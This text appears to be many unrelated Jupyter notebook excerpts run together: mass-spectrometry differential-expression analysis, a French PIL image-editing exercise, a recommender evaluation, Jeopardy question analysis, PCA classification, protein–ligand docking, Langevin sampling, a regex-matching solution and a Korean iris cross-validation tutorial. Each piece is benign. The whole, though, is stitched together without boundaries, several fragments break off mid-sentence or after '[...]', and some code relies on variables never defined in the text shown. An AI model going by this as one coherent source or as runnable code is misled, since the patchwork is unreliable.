However, fold changes and p-values from Wilcoxon test are already sufficient to rank ions in some way.- In the end after trying different options I arrived at a conclusion that it more or less doesn't matter, how exactly you do DE testing. But once you got top markers, it's important to check the following: - Intensity distributions really differ between conditions with the normalization that was chosen (all intensity distribtuions were plotted in the previous step) and it's not because of some outliers or something weird about how median was calculated - Checking ion in Metaspace shows that it is really intracellular, without strange gradients or missing parts in the ion image. Diagnostics should show that all the expected isotopic peaks are present and if intensity of the ion is high enough, isotopologue's spatial distribution looks colocalized with the main peak. If there is inconsistency between expected and observed isotopic peaks, it means that annotation is not reliable and it's better to be careful about interpreting its biological meaning - Up or down regulation of the molecule corresponds to what is expected based on literature or bulk mass spec Scanpy Wilcoxon testsc.tl.rank_genes_groups(adata, cond_col, method='wilcoxon', key_added = "wilcoxon", gene_symbols="var_names") sc.pl.rank_genes_groups(adata, n_genes=25, sharey=False, key="wilcoxon", gene_symbols="var_names")/Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/scanpy/tools/_rank_genes_groups.py:417: RuntimeWarning: overflow encountered in expm1 foldchanges = (self.expm1_func(mean_group) + 1e-9) / ( /Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/scanpy/tools/_rank_genes_groups.py:418: RuntimeWarning: overflow encountered in expm1 self.expm1_func(mean_rest) + 1e-9 /Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/scanpy/tools/_rank_genes_groups.py:417: RuntimeWarning: invalid value encountered in true_divide foldchanges = (self.expm1_func(mean_group) + 1e-9) / ( /Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/scanpy/tools/_rank_genes_groups.py:417: RuntimeWarning: overflow encountered in expm1 foldchanges = (self.expm1_func(mean_group) + 1e-9) / ( /Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/scanpy/tools/_rank_genes_groups.py:418: RuntimeWarning: overflo[...]There are lots of different plots to [visualize results of DE](https://nbisweden.github.io/workshop-scRNAseq/labs/compiled/scanpy/scanpy_05_dge.html) Save differential expression tablediff_expr_df = sc.get.rank_genes_groups_df(adata, None, key="wilcoxon", gene_symbols="var_names") diff_expr_df = diff_expr_df.sort_values("pvals_adj", ascending=True) diff_expr_df.head() diff_expr_df.to_csv(plots_path / "diff_expr.csv", index=False)Volcano plotVolcano plots are typically used to visualize results of DE analysis. It is a plot of $log_2(fold change)$ vs $-log_{10}(pval)$, so the plot shows how many ions were found to significantly change their abundance. Machine epsilon is added to each p-value to avoid $log(0)$ errors. Normally genes with small fold change should also have high p-value, because to detect small effect one needs big sample size, and genes with large change have lower p-values, creating "volcano" shape. Then the plot can be used to decide, what thresholds for significance and fold changes to use to identify ions of interest. 
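For orientation, the quantities on those two axes can be computed directly from the DE table saved above. The sketch below only illustrates the axes and cut-offs; the outer_spacem volcano_plot helper used next applies its own filtering and styling, and the 0.05 / 2-fold thresholds here simply mirror the arguments passed to it.
import numpy as np
import matplotlib.pyplot as plt

# Volcano coordinates straight from the Scanpy DE table: log2 fold change on x,
# -log10 of the adjusted p-value (plus machine epsilon to avoid log10(0)) on y.
eps = np.finfo(float).eps
x = diff_expr_df["logfoldchanges"]
y = -np.log10(diff_expr_df["pvals_adj"] + eps)

# Mark "hits": adjusted p below 0.05 and |log2FC| above log2(2) = 1, i.e. a 2-fold change.
pval_thresh, foldch_thresh = 0.05, 2
is_hit = (diff_expr_df["pvals_adj"] < pval_thresh) & (x.abs() > np.log2(foldch_thresh))

plt.scatter(x, y, s=5, c=np.where(is_hit, "tab:red", "lightgrey"))
plt.xlabel("log2(fold change)")
plt.ylabel("-log10(adjusted p-value)")
plt.title("Volcano plot (manual sketch)")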
Especially in our case statistical tests show that everything is significant, so one has to choose much lower threshold for p-values, than standard 0.05. Another useful thing to look at is if there are any outliers in fold changes.volcano_plot(adata, "wilcoxon", plots_path, pval_thresh=0.05, foldch_thresh=2, gene_symbols="var_names")/Users/alberto-mac/EMBL_repos/outer-spacem/outer_spacem/pl/_diff_expr.py:109: SettingWithCopyWarning: A value is trying to be set on a copy of a slice from a DataFrame. Try using .loc[row_indexer,col_indexer] = value instead See the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy df_group["significant"] = df_group["pvals_adj"] < pval_thresh /Users/alberto-mac/EMBL_repos/outer-spacem/outer_spacem/pl/_diff_expr.py:112: SettingWithCopyWarning: A value is trying to be set on a copy of a slice from a DataFrame. Try using .loc[row_indexer,col_indexer] = value instead See the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy df_group["up"] = df_group["significant"] & (df_group["logfoldchanges"] > up_thresh) /Users/alberto-mac/EMBL_repos/outer-spacem/outer_spacem/pl/_diff_expr.py:113: SettingWithCopyWarning: A value is tryi[...]Plot ion intensity distribtuions per conditiondist_plots_path = plots_path / "intensity_distributions" dist_plots_path.mkdir(parents=True, exist_ok=True) plot_distributions(adata, cond_col, dist_plots_path, gene_symbols="var_names")/Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/numpy/core/fromnumeric.py:3440: RuntimeWarning: Mean of empty slice. return _methods._mean(a, axis=axis, dtype=dtype, /Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/numpy/core/_methods.py:189: RuntimeWarning: invalid value encountered in true_divide ret = ret.dtype.type(ret / rcount) /Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/matplotlib/axes/_base.py:2475: UserWarning: Warning: converting a masked element to nan. xys = np.asarray(xys) /Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/numpy/core/fromnumeric.py:3440: RuntimeWarning: Mean of empty slice. return _methods._mean(a, axis=axis, dtype=dtype, /Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/numpy/core/_methods.py:189: RuntimeWarning: invalid value encountered in true_divide ret = ret.dtype.type(ret / rcount) /Users/alberto-mac/miniconda[...]CH4 TP : Retouche d'image - ELEVESmodule PIL, pixels, tuples--- 1 Découverte de PILCe TP de retouche d'image utilise le module PIL (*python Image Library*), et le module IPython.display(affichages dans le notebook):from PIL import Image # to load images from IPython.display import display # to display images im = Image.open('./Images/mona_lisa.jpg') display(im)Vous pouvez, dans ce TP choisir de travailler sur une autre image. Dans ce cas la télécharger dans le dossier ./Images. Veillez à conserver une taille raisonnable (moins de 500x500).# Informations sur le fichier en utilisant le print formaté. print(f'type:{im.format}, taille:{im.size}, mode:{im.mode}')Quel est le type de l'attribut size de l'image im ? 
_ _ _ _ _ _ _ _ _ _ _ _ _ ---Chaque pixel est caractérisé par :- sa position (un tuple (x,y) )- sa couleur (un tuple (r,g,b) )---Les deux méthodes de PIL les plus utiles pour le traitement des pixels sont :- **getpixel: tuple(x,y) -> tuple(r,g,b)**- **putpixel: tuple(x,y) x tuple(r,g,b) -> ?**Tester ces deux exemples :r,v,b=im.getpixel((100,250)) print("R : ",r,"V : ",v,"B : ",b) im.putpixel((100,100),(255,0,0))Que fait cette deuxième commande ? _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _Pour tester les modifications, vous pouvez lancer à tout moment la commande**display(im)**--- Partie 2 : Retouche de pixelsLes retouches d'images proposées ici concernent les couleurs. Il s'agit de construire des fonctions qui s'appliqueront aux pixels et qui modifieront leur tuple (R,V,B) :- inversion des couleurs- conversion en niveaux de gris- filtres A chaque fois que vous avez créé une fonnction qui modifie votre pixel. Il faut l'appliquer à tous les pixels de votre image. Ceci est réalisé grâce à une double boucle :# ici l'odre est lexicographique for j in range(im.size[1]): for i in range(im.size[0]): #traitement sur le pixel en (i,j) im.putpixel((i,j),filtre_rouge(im.getpixel((i,j)))) display(im)2.1 : Inversion des couleurs : (*)Inverser des couleurs, c'est mettre des 0 à la place des 1 et réciproquement :**inverser: tuple -> tuple**def inverser(c): '''inversion des couleurs entree : tuple r,g,b sortie : tuple r,g,b'''2.2 Niveaux de grisUne image apparaît grise si r=g=b dans la composante r,g,bUn calcul donne le niveau de gris **Gris = 0.299 Rouge + 0.587 Vert + 0.114 Bleu**Cette formule rend compte de la manière dont l’œil humain perçoit les trois composantes, rouge, vert et bleu, de la lumière. Pour chacune d'elles, la somme des 3 coefficients vaut 1. On remarquera la forte inégalité entre ceux-ci : une lumière verte apparaît plus claire qu'une lumière rouge, et encore plus qu'une lumière bleue. **griser: tuple->tuple**def griser(c): '''griser une couleur entree : (r,g,b) sortie : (r,g,b) grisé '''2.3 Filtre rougeUn filtre qui ne laisse passer que les rouges**filtre_rouge: tuple->tuple**def filtre_rouge(c): '''filtre rouge entree : (r,g,b) sortie : (r,g,b) seuls les rouges spnt conserves'''2.4 Effet libre : A vous d'inventer des nouveaux effets --- 3. 
Une autre approche de l'accès aux pixelsRemarque : Pour accélerer le traitement d'images, on peut remplacer les fonctions getpixel et putpixel par un accès direct au tableau bidimentionnel des pixels :# PIL accesses images in Cartesian co-ordinates, so it is Image[columns, rows] # plus rapide que putpixel ou getpixel img = Image.new( 'RGB', (250,250), "black") # create a new black image pixels = img.load() # create the pixel map for j in range(img.size[1]): for i in range(img.size[0]): pixels[i,j] = (i, j, 100) # set the colour accordingly display(img)Load Train/Test UserItemSettrain_set = UserItemSet.load_cls_from_file('trainset', '../data') test_set = UserItemSet.load_cls_from_file('testset', '../data') svd_recommender = SVDRecommender(250).fit(train_set) svd_recommender.save_to_file('svd_recommender_test', '../data') svd_recommender = SVDRecommender.load_cls_from_file('svd_recommender_test', '../data') user2recommended_items = svd_recommender.predict(test_set, train_set, remove_users_not_in_train=True, max_score_to_filter=0.0) mapk_scores = [] for user, recommended_items in user2recommended_items.items(): mapk_scores.append(apk(test_set.user2items_inner[user], recommended_items, k=100)) np.mean(mapk_scores)Objective2from obj3 import * pg=Polygons(5,7) for k in pg: print(k)Polygon(5,7) Polygon(4,7)Winning JeopardyJeopardy is a popular TV show in the US where participants answer questions to win money. It's been running for a few decades, and is a major force in popular culture.import pandas as pd import numpy as np import csv jeopardy = pd.read_csv('jeopardy.csv') jeopardy.head() jeopardy.columns #Removing the spaces in the column name jeopardy.columns = ['Show Number', 'Air Date', 'Round', 'Category', 'Value', 'Question', 'Answer']Normalizing TextBefore we start doing analysis on the Jeopardy questions, we need to normalize all of the text columns (the Question and Answer columns). The idea is to ensure that we lowercase words and remove punctuation so (Don't and don't) aren't considered to be different words when you compare them.import re def normalize(string): string = string.lower() string = re.sub("[^A-Za-z0-9\s]", "", string) string = re.sub("\s+", " ", string) return string #Normalizing Question column jeopardy["clean_question"] = jeopardy['Question'].apply(normalize) #Normalizing Answer column jeopardy["clean_answer"] = jeopardy['Answer'].apply(normalize)Normalizing columnsNow that We've normalized the text columns, there are also some other columns to normalize.The Value column should also be numeric, to allow us to manipulate it more easily. We'll need to remove the dollar sign from the beginning of each value and convert the column from text to numeric.The Air Date column should also be a datetime, not a string, to enable us to work with it more easily.def normalize_values(string): string = re.sub("[^A-Za-z0-9\s]", "", string) try: string = int(string) except Exception: string = 0 return string #Normalizing the value columns jeopardy['clean_value'] = jeopardy['Value'].apply(normalize_values) jeopardy["Air Date"] = pd.to_datetime(jeopardy["Air Date"]) jeopardy.head()Answers in questionIn order to figure out whether to study past questions, study general knowledge, or not study it all, it would be helpful to figure out two things:- How often the answer is deducible from the question.- How often new questions are repeats of older questions.We can answer the second question by seeing how often complex words (> 6 characters) reoccur. 
we can answer the first question by seeing how many times words in the answer also occur in the question. We'll work on the first question now, and come back to the second.def count_matches(row): split_answer = row["clean_answer"].split() split_question = row["clean_question"].split() if "the" in split_answer: split_answer.remove("the") if len(split_answer) == 0: return 0 match_count = 0 for item in split_answer: if item in split_question: match_count += 1 return match_count / len(split_answer) jeopardy["answer_in_question"] = jeopardy.apply(count_matches, axis=1) jeopardy.head() jeopardy['answer_in_question'].mean()Recycled QuestionsOn average, the answer only makes up for about 6% of the question. This isn't a huge number, and means that we probably can't just hope that hearing a question will enable us to figure out the answer. We'll probably have to studyquestion_overlap = [] terms_used = set() jeopardy = jeopardy.sort_values("Air Date") for i, row in jeopardy.iterrows(): split_question = row["clean_question"].split(" ") split_question = [q for q in split_question if len(q) > 5] match_count = 0 for word in split_question: if word in terms_used: match_count += 1 for word in split_question: terms_used.add(word) if len(split_question) > 0: match_count /= len(split_question) question_overlap.append(match_count) jeopardy["question_overlap"] = question_overlap jeopardy["question_overlap"].mean()Low values vs High values questionsThere is about 70% overlap between terms in new questions and terms in old questions. This only looks at a small set of questions, and it doesn't look at phrases, it looks at single terms. This makes it relatively insignificant, but it does mean that it's worth looking more into the recycling of questions.def determine_value(row): value = 0 if row["clean_value"] > 800: value = 1 return value jeopardy["high_value"] = jeopardy.apply(determine_value, axis=1) def count_usage(term): low_count = 0 high_count = 0 for i, row in jeopardy.iterrows(): if term in row["clean_question"].split(" "): if row["high_value"] == 1: high_count += 1 else: low_count += 1 return high_count, low_count from random import choice terms_used_list = list(terms_used) comparison_terms = [choice(terms_used_list) for _ in range(10)] observed_expected = [] for term in comparison_terms: observed_expected.append(count_usage(term)) observed_expectedApplying Chi-Squared testNow that we have found the observed counts for a few terms, we can compute the expected counts and the chi-squared valuefrom scipy.stats import chisquare import numpy as np high_value_count = jeopardy[jeopardy["high_value"] == 1].shape[0] low_value_count = jeopardy[jeopardy["high_value"] == 0].shape[0] chi_squared = [] for obs in observed_expected: total = sum(obs) total_prop = total / jeopardy.shape[0] high_value_exp = total_prop * high_value_count low_value_exp = total_prop * low_value_count observed = np.array([obs[0], obs[1]]) expected = np.array([high_value_exp, low_value_exp]) chi_squared.append(chisquare(observed, expected)) chi_squaredDo the PCA part, reducing the dimensionalityF=PCA(5) # only the top 5 data_train_reduced=F.fit_transform_data(data_train) data_test_reduced=F.transform_data(data_test) train_vectors_reduced=F.fit_transform(data_train.vectors) test_vectors_reduced=F.transform(data_test.vectors) print("shape train vectors:",data_train.vectors.shape) print("shape train vectors reduced:",data_train_reduced.vectors.shape) timeit(reset=True) C.fit(data_train_reduced.vectors,data_train_reduced.targets) print("Training 
time: ",timeit()) print("On Training Set:",C.percent_correct(data_train_reduced.vectors,data_train_reduced.targets)) print("On Test Set:",C.percent_correct(data_test_reduced.vectors,data_test_reduced.targets)) F.weights.shapeVisualizing the componentsF.plot()you can specify which ones to plotF.plot([2,3,4])if it is an image, then you can show the components as imagesF.imshow(shape=(8,8))Tuning the number of PCs specify how many PCs to try...PCs=[2,4,6,8,10,20,40] percent_correct=[] for n in PCs: F=PCA(n) data_train_reduced=F.fit_transform_data(data_train) data_test_reduced=F.transform_data(data_test) C=NaiveBayes() C.fit(data_train_reduced.vectors,data_train_reduced.targets) percent_correct.append(C.percent_correct(data_test_reduced.vectors,data_test_reduced.targets)) plot(PCs,percent_correct,'-o') xlabel('Number of PCs') ylabel('Percent Correct on Test Data')this does exactly the same thing, but does every number from 1 to 40, skipping every 2 (1,3,5,7,....,39]PCs=arange(1,40,2) percent_correct=[] for n in PCs: F=PCA(n) data_train_reduced=F.fit_transform_data(data_train) data_test_reduced=F.transform_data(data_test) C=NaiveBayes() C.fit(data_train_reduced.vectors,data_train_reduced.targets) percent_correct.append(C.percent_correct(data_test_reduced.vectors,data_test_reduced.targets)) plot(PCs,percent_correct,'-o') xlabel('Number of PCs') ylabel('Percent Correct on Test Data')Getting rid of some PCsF=PCA(10) data_train_reduced=F.fit_transform_data(data_train) data_test_reduced=F.transform_data(data_test) C=NaiveBayes() C.fit(data_train_reduced.vectors,data_train_reduced.targets) print(C.percent_correct(data_test_reduced.vectors,data_test_reduced.targets)) data_train_reduced_removed=extract_features(data_train_reduced,list(range(2,10))) data_test_reduced_removed=extract_features(data_test_reduced,list(range(2,10))) C=NaiveBayes() C.fit(data_train_reduced_removed.vectors,data_train_reduced_removed.targets) print(C.percent_correct(data_test_reduced_removed.vectors,data_test_reduced_removed.targets))81.7777777778Docking fragments to PHIP2 site 1This content is by and , originally writen/adapted for a course (and available on GitHub at https://github.com/MobleyLab/drug-computing/blob/master/uci-pharmsci/lectures/docking_scoring_pose/OEDocking.ipynb) with heavy influence from the OpenEye documentation. It was adapted by David Mobley to the present PHIP2 Stage 2 challenge, and also utilizes examples I prepared for SAMPL5. 
https://github.com/samplchallenges/SAMPL6/blob/master/host_guest/GenerateInputs.ipynb#Import our required openeye modules from openeye import oechem, oedocking, oeomega import os # Load protein as preparation for making a "receptor" for docking #protein_file = '../../../PHIPA_C2_Apo.pdb' protein_file = '5enh_protein.pdb' ligand_file = '5enh_ligand.pdb' protein = oechem.OEGraphMol() ligand = oechem.OEGraphMol() ifile = oechem.oemolistream(protein_file) oechem.OEReadMolecule(ifile, protein) ifile.close() ifile = oechem.oemolistream(ligand_file) oechem.OEReadMolecule(ifile, ligand) ifile.close() #ifile = 'PHIPA_C2_DU.oedu' #du = oechem.OEDesignUnit() #oechem.OEReadDesignUnit(ifile, du) #du.GetProtein(protein) # INPUT BINDING SITE LOCATION siteloc = oechem.OEFloatArray(3) siteloc[0] = -19.150 siteloc[1] = -12.842 siteloc[2] = 24.7000 # Receptor file name receptor_file = '5enh_prepped.oeb' #receptor_file = 'PHIP2_apo_prepped.oeb' receptor = oechem.OEGraphMol() # Prep receptor if not os.path.isfile(receptor_file): oedocking.OEMakeReceptor(receptor, protein, ligand) #oedocking.OEMakeReceptor(receptor, protein, siteloc[0], siteloc[1], siteloc[2]) oedocking.OEWriteReceptorFile(receptor, receptor_file) else: #Read in our receptor from disc if not oedocking.OEReadReceptorFile( receptor, receptor_file ): # raise an exception if the receptor file cannot be read raise Exception("Unable to read receptor from {0}".format( receptor_file )) #Set the docking method and other paramters # Note: Chemgauss4 is the scoring function for FRED dock_method = oedocking.OEDockMethod_Chemgauss4 dock_resolution = oedocking.OESearchResolution_Default sdtag = oedocking.OEDockMethodGetName( dock_method ) #Generate our OEDocking object dock = oedocking.OEDock( dock_method, dock_resolution) #Initialize the OEDocking by providing it the receptor if not dock.Initialize(receptor): # raise an exception if the receptor cannot be initialized raise Exception("Unable to initialize Docking with {0}".format(receptor_file))Now that we have initialized our OEDocking object with our receptor, let's write a function that will take in the following input parameters: - dock: OEDock object - sdtag: string representing the name of the docking method - numpose: int with the number of poses to generate for each ligand - mcmol: multicomformer moleculedef dock_molecule( dock: "OEDock", sdtag: str, num_poses: int, mcmol ) -> tuple: ''' Docks the multiconfomer molecule, with the given number of poses Returns a tuple of the docked molecule (dockedMol) and its score i.e. 
( dockedMol, score ) ''' dockedMol = oechem.OEMol() #Dock the molecule into a given number of poses res = dock.DockMultiConformerMolecule(dockedMol, mcmol, num_poses) if res == oedocking.OEDockingReturnCode_Success: #Annotate the molecule with the score and SDTag that contains the docking method oedocking.OESetSDScore(dockedMol, dock, sdtag) dock.AnnotatePose(dockedMol) score = dock.ScoreLigand(dockedMol) oechem.OESetSDData(dockedMol, sdtag, "{}".format(score)) return dockedMol, score else: # raise an exception if the docking is not successful raise Exception("Unable to dock ligand {0} to receptor".format( dockedMol ))With the docking function written, we can then loop over our 3D molecules and dock them to the given receptor# Read input molecule SMILES ligand_file = '../../../Stage-2-input-data/site-1_fragment-hits.csv' file = open(ligand_file,'r') text = file.readlines() file.close() ligands = {} omega = oeomega.OEOmega() omega.SetMaxConfs(500) # Temporary hack for F501 and F179, see https://github.com/samplchallenges/SAMPL7/issues/77 omega.SetStrictStereo(False) for line in text: tmp = line.split(',') mol = oechem.OEMol() mol.SetTitle(tmp[0]) smi = tmp[1].strip() # Parse SMILES to OEMol, generate conformers oechem.OEParseSmiles(mol, smi) status = omega(mol) if not status: print(f"Error running omega on {tmp[0]}.") # Store smiles string, mol w conformers to dictionary as tuple ligands[tmp[0].strip()] = ( smi , mol) #Define how many docked poses to generate per molecule num_poses = 1 outdir = 'poses' if not os.path.isdir(outdir): os.mkdir(outdir) #Read in our 3D molecules for lig_code in ligands: #Call our docking function dockedMol, score = dock_molecule( dock, sdtag, num_poses, ligands[lig_code][1] ) print("{} {} score = {:.4f}".format(sdtag, dockedMol.GetTitle(), score)) # Write output; as per challenge instructions each fragment to separate file ofs = oechem.oemolostream(os.path.join(outdir, f'PHIP2-{lig_code}-1.sdf')) oechem.OEWriteMolecule(ofs, dockedMol) ofs.close() # Make protein files to go along with submisssion import shutil for lig_code in ligands: outname = os.path.join(outdir, f'PHIP2-{lig_code}-1.pdb') shutil.copy(protein_file, outname)Build a diffusion solverIn this series of notebooks we use logistic regression as the example. However the usage is exactly the same for other models.Here we go to the lowest level of abstraction in `SGMCMCJax`: the solver for the diffusion.# import model and create dataset from sgmcmcjax.models.logistic_regression import gen_data, loglikelihood, logprior key = random.PRNGKey(42) dim = 10 Ndata = 100000 theta_true, X, y_data = gen_data(key, dim, Ndata) data = (X, y_data)WARNING:absl:No GPU/TPU found, falling back to CPU. (Set TF_CPP_MIN_LOG_LEVEL=0 and rerun for more info.)Here we import the solver for the Langevin diffusion for SGLD. We also import the function that builds the gradient of the log-posterior.The usage of the diffusion function is very similar to JAX [optimizer's](https://jax.readthedocs.io/en/latest/jax.experimental.optimizers.html) module. Calling `sgld(1e-5)` return 3 functions:- `init_fn`: this takes in the initial parameter and returns a `state` object- `update`: this takes in the iteration number, random key, gradient, and state. It returns the updated state- `get_params`: this takes in a `state` object and returns the parameterNote that here we must calculate the gradient at each iteration ourselves. This is useful if the data doesn't fit in memory so must be regularly loaded into memory. 
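If loading the full dataset at every step is not an option, one common alternative is to estimate the gradient on a random minibatch and hand that to the update step instead. The sketch below is written in plain JAX and is only an illustration: the batch size, the Ndata/batch_size rescaling of the likelihood term, the standard-normal prior, and the inlined logistic-regression log-likelihood are all assumptions made here, not SGMCMCJax API.
import jax
import jax.numpy as jnp

batch_size = 1000

def log_post_minibatch(theta, X_batch, y_batch):
    # Bernoulli/logistic log-likelihood on the minibatch (a stand-in for the model's own
    # `loglikelihood`), rescaled so the estimate is unbiased for the full-data sum.
    logits = X_batch @ theta
    loglik = jnp.sum(y_batch * logits - jnp.log1p(jnp.exp(logits)))
    logprior = -0.5 * jnp.sum(theta ** 2)
    return logprior + (Ndata / batch_size) * loglik

grad_estimator = jax.jit(jax.grad(log_post_minibatch))

key, subkey = jax.random.split(key)
idx = jax.random.choice(subkey, Ndata, shape=(batch_size,), replace=False)
stochastic_grad = grad_estimator(theta_true, X[idx], y_data[idx])
# `stochastic_grad` could then be passed to the diffusion's update step in place of the
# full-data gradient used below.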
It is also useful if we want to implement our own gradient estimator that isn't included in the package.In this example we simply use the entire dataset with a Langevin diffusion. As a result this sampler is the Unadjusted Langevin Algorithm.from sgmcmcjax.diffusions import sgld from sgmcmcjax.util import build_grad_log_post init_fn, update, get_params = sgld(1e-5) update = jit(update) grad_log_post = build_grad_log_post(loglikelihood, logprior, data) %%time Nsamples = 1000 state = init_fn(theta_true) samples = [] for i in tqdm(range(Nsamples)): key, subkey = random.split(key) mygrad = grad_log_post(get_params(state), *data) # use all the data. state = update(i, subkey, mygrad, state) samples.append(get_params(state)) samples = np.array(samples) plt.plot(samples[10:,1])**EDA**df.info() df.describe() df.columns df.isnull().sum()**Model fit & training**X = df.iloc[:, 1:2].values y = df.iloc[:, 2].values regressor = DecisionTreeRegressor() regressor.fit(X, y)**Prediction**y_pred = regressor.predict(np.reshape(np.array(11),(-1, 1))) #Predict class or regression value for X. y_pred**Saving Decision tree**dot_data = export_graphviz(regressor, filled=True, rounded=True) graph = graph_from_dot_data(dot_data) graph.write_png("regressor_position.png") import cv2 img = cv2.imread("regressor_position.png") plt.figure(figsize = (15, 15)) plt.imshow(img)Get the simulation-based distance errors by using Haversine distance instead of network distanceSome areas are very large to run the simulation, so this part focuses on the distance errors in the selected urban areas.%load_ext autoreload %autoreload 2 %matplotlib inline import os import subprocess import sys import yaml import pandas as pd from pprint import pprint import geopandas as gpd import json def get_repo_root(): """Get the root directory of the repo.""" dir_in_repo = os.path.dirname(os.path.abspath('__file__')) # os.getcwd() return subprocess.check_output('git rev-parse --show-toplevel'.split(), cwd=dir_in_repo, universal_newlines=True).rstrip() sys.path.append(get_repo_root()) ROOT_dir = get_repo_root() with open(ROOT_dir + '/lib/regions.yaml') as f: region_manager = yaml.load(f, Loader=yaml.FullLoader) def get_region_area(region=None): # The boundary to use when downloading drive networks utm_epsg = region_manager[region]['utm_epsg'] zone_id = region_manager[region]['zone_id'] zones_path = region_manager[region]['zones_path'] zones = gpd.read_file(ROOT_dir + zones_path) zones = zones.loc[zones[zone_id].notnull()] zones = zones.rename(columns={zone_id: "zone"}) zones.zone = zones.zone.astype(int) zones = zones.loc[zones.geometry.notnull()].to_crs(utm_epsg) boundary = zones.assign(a=1).dissolve(by='a') area = boundary['geometry'].area/ 10**6 return area.values[0]1. Find the regions for analysisrunid = 7 regions = [x for x in region_manager if os.path.exists(ROOT_dir + f'/dbs/{x}/visits/visits_{runid}_trips_dom_network.csv')] pprint(regions)['barcelona', 'madrid', 'surabaya', 'johannesburg', 'capetown', 'kualalumpur', 'cebu', 'guadalajara', 'stpertersburg', 'nairobi']2. 
Calculate the urban areas (km^2)region_area_dict = {x: get_region_area(region=x) for x in regions} pprint(region_area_dict) with open(ROOT_dir + '/results/region_area_urban.txt', 'a') as outfile: json.dump(region_area_dict, outfile) outfile.write('\n') pprint([float("%.1f"%region_area_dict[x]) for x in regions]) df_area = pd.DataFrame.from_dict(region_area_dict, columns=['area'], orient='index').sort_values('area') pprint(df_area.index) pprint([region_manager[x]['name'] for x in df_area.index])Index(['guadalajara', 'kualalumpur', 'surabaya', 'barcelona', 'madrid', 'nairobi', 'stpertersburg', 'johannesburg', 'capetown', 'cebu'], dtype='object') ['Guadalajara, Mexico', 'Kuala Lumpur, Malaysia', 'Surabaya, Indonesia', 'Barcelona, Spain', 'Madrid, Spain', 'Nairobi, Kenya', 'Saint Petersburg, Russia', 'Johannesburg, South Africa', 'Cape Town, South Africa', 'Cebu, Philippines']3. Merge distance files and savedef region_data_loader(region=None, runid=None): df = pd.read_csv(ROOT_dir + f'/dbs/{region}/visits/visits_{runid}_trips_dom_network.csv') df.loc[:, 'region'] = region df.loc[:, 'distance_network'] += 0.4 # Compensate walking distance in 5 min return df.loc[:, ['region', 'distance', 'distance_network']] list_df = [region_data_loader(region=x, runid=runid) for x in regions] df = pd.concat(list_df) df = df.loc[(df.distance > 0.1) & (df.distance_network >= df.distance), :] df.loc[:, 'diff'] = df.loc[:, 'distance_network'] / df.loc[:, 'distance'] df.head() df.groupby('region')['diff'].median() df.to_csv(ROOT_dir + '/dbs/distance_error_simulation.csv', index=False)Given an input string (s) and a pattern (p), implement regular expression matching with support for `'.'` and `'*'`. '.' Matches any single character. '*' Matches zero or more of the preceding element. The matching should cover the entire input string (not partial).Note:- s could be empty and contains only lowercase letters a-z.- p could be empty and contains only lowercase letters a-z, and characters like . or *.Example 1: Input: s = "aa" p = "a" Output: false Explanation: "a" does not match the entire string "aa". Example 2: Input: s = "aa" p = "a*" Output: true Explanation: '*' means zero or more of the precedeng element, 'a'. Therefore, by repeating 'a' once, it becomes "aa". Example 3: Input: s = "ab" p = ".*" Output: true Explanation: ".*" means "zero or more (*) of any character (.)". Example 4: Input: s = "aab" p = "c*a*b" Output: true Explanation: c can be repeated 0 times, a can be repeated 1 time. Therefore it matches "aab". Example 5: Input: s = "mississippi" p = "mis*is*p*." 
Output: false [【LeetCode】正则表达式匹配(动态规划)](https://www.cnblogs.com/mfrank/p/10472663.html)# recursion, very slow class Solution: def isMatch(self, s: str, p: str) -> bool: if not p: return not s first_try = bool(s) and p[0] in {s[0],'.'} if len(p) >= 2 and p[1] == '*': return self.isMatch(s,p[2:]) or first_try and self.isMatch(s[1:],p) else: return first_try and self.isMatch(s[1:],p[1:]) # test s = "ab" p = ".*" Solution().isMatch(s,p) # dp, bottom to up class Solution: def isMatch(self, s: str, p: str) -> bool: dp = [[False]*(len(p)+1) for _ in range(len(s)+1)] dp[-1][-1] = True for i in range(len(s),-1,-1): for j in range(len(p)-1,-1,-1): first_try = i < len(s) and p[j] in {s[i],'.'} if j+1 < len(p) and p[j+1] == '*': dp[i][j] = dp[i][j+2] or first_try and dp[i+1][j] else: dp[i][j] = first_try and dp[i+1][j+1] return dp[0][0] # test s = "ab" p = ".*" Solution().isMatch(s,p)붓꽃(Iris) 품종 데이터 예측하기 Table of Contents1  DataFrame2  Train/Test 데이터 나누어 학습하기3  데이터 학습 및 평가하기4  교차 검증 (Cross Validation)4.1  교차검증 종류4.2  Kfold4.3  StratifiedKFold4.4  LeaveOnOutimport numpy as np import pandas as pd import matplotlib as mpl import matplotlib.pyplot as plt from sklearn import * from sklearn.datasets import load_iris from sklearn.tree import DecisionTreeClassifier from sklearn.model_selection import train_test_split from sklearn.metrics import accuracy_scoreDataFrameiris = load_iris() iris_df = pd.DataFrame(data=iris.data,columns=iris.feature_names) iris_df['label'] = iris.target iris_df iris_df.shapeTrain/Test 데이터 나누어 학습하기X_train, X_test , y_train, y_test = train_test_split(iris.data, iris.target, test_size = 0.3, random_state = 100)데이터 학습 및 평가하기dt_clf = DecisionTreeClassifier() # 분류기 정의 및 fit dt_clf.fit(X_train,y_train) # 학습 y_pred = dt_clf.predict(X_test) # 예측한 결과 저장 accuracy_score(y_test,y_pred) # dt_clf.score(X_test, y_test)랑 같은 거교차 검증 (Cross Validation) 교차검증 종류 1. K-fold Cross-validation - 데이터셋을 K개의 sub-set으로 분리하는 방법 - 분리된 K개의 sub-set중 하나만 제외한 K-1개의 sub-sets를 training set으로 이용하여 K개의 모델 추정 - 일반적으로 K=5, K=10 사용 (-> 논문참고) - K가 적어질수록 모델의 평가는 편중될 수 밖에 없음 - K가 높을수록 평가의 bias(편중된 정도)는 낮아지지만, 